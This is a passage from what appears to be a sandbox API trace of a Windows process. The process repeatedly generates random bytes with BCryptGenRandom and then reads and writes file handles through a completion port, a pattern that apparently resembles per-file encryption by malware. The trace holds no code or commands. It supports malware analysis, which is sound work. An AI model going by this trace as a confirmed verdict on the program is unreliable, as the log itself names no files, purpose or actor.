lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.273] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x5ca0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.296] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0080.296] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.297] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0080.297] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.297] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.297] free (_Block=0x1ff1e60) [0080.297] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.297] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.298] free (_Block=0x1ff1e60) [0080.298] free (_Block=0x1ff1930) [0080.298] free (_Block=0x77d800) [0080.298] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.298] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.299] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x4230, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.300] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.322] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x11da, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0080.348] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.349] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.349] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0080.349] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.350] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0080.350] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.350] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.350] free (_Block=0x1ff1e60) [0080.350] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.350] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.351] free (_Block=0x1ff1e60) [0080.351] free (_Block=0x1ff1930) [0080.351] free (_Block=0x77d800) [0080.351] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.351] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.351] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.352] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.379] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.380] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.381] CloseHandle (hObject=0x3a0) returned 1 [0080.384] free (_Block=0x1fb18c0) [0080.384] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.410] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0080.410] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.410] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0080.411] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.411] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.411] free (_Block=0x1ff1e60) [0080.411] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.411] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.411] free (_Block=0x1ff1e60) [0080.411] free (_Block=0x1ff1930) [0080.411] free (_Block=0x77d800) [0080.411] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.426] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.434] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x13a1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.450] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0080.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.458] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0080.458] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.459] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0080.459] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.459] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.459] free (_Block=0x1ff1e60) [0080.459] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.459] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.459] free (_Block=0x1ff1e60) [0080.459] free (_Block=0x1ff1930) [0080.460] free (_Block=0x77d800) [0080.460] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.484] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.484] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.493] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.493] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0080.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0080.514] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.514] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.514] free (_Block=0x77d800) [0080.514] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.514] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.514] free (_Block=0x1ff1930) [0080.514] free (_Block=0x1ff1a40) [0080.515] free (_Block=0x77d908) [0080.515] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.897] CloseHandle (hObject=0x3c0) returned 1 [0080.897] free (_Block=0x1ff1e60) [0080.897] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.911] CloseHandle (hObject=0x3a0) returned 1 [0080.911] free (_Block=0x3d70048) [0080.911] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.925] CloseHandle (hObject=0x3c4) returned 1 [0080.926] free (_Block=0x1fb18c0) [0080.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.941] ReadFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.955] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x166e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.127] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xb05, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.127] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.127] CloseHandle (hObject=0x3c4) returned 1 [0081.132] free (_Block=0x1fb18c0) [0081.132] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.141] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.142] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.142] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.142] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.142] free (_Block=0x77d800) [0081.142] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.142] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.143] free (_Block=0x1ff1930) [0081.143] free (_Block=0x1ff1a40) [0081.143] free (_Block=0x77d908) [0081.143] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.143] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.144] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x43f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.144] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.159] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xb57, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.159] CloseHandle (hObject=0x3c4) returned 1 [0081.164] free (_Block=0x1fb18c0) [0081.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.185] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.185] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.185] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.186] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.186] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.186] free (_Block=0x77d800) [0081.186] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.186] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.186] free (_Block=0x1ff1930) [0081.186] free (_Block=0x1ff1a40) [0081.187] free (_Block=0x77d908) [0081.187] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.187] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.188] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.189] CloseHandle (hObject=0x3c4) returned 1 [0081.189] free (_Block=0x1fb18c0) [0081.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.197] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.198] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.198] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.198] free (_Block=0x77d800) [0081.198] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.198] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.199] free (_Block=0x1ff1930) [0081.199] free (_Block=0x1ff1a40) [0081.199] free (_Block=0x77d908) [0081.199] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.199] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.199] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.199] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.216] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13a1, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.217] CloseHandle (hObject=0x3c4) returned 1 [0081.220] free (_Block=0x1fb18c0) [0081.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.230] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.231] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.231] LoadLibraryA 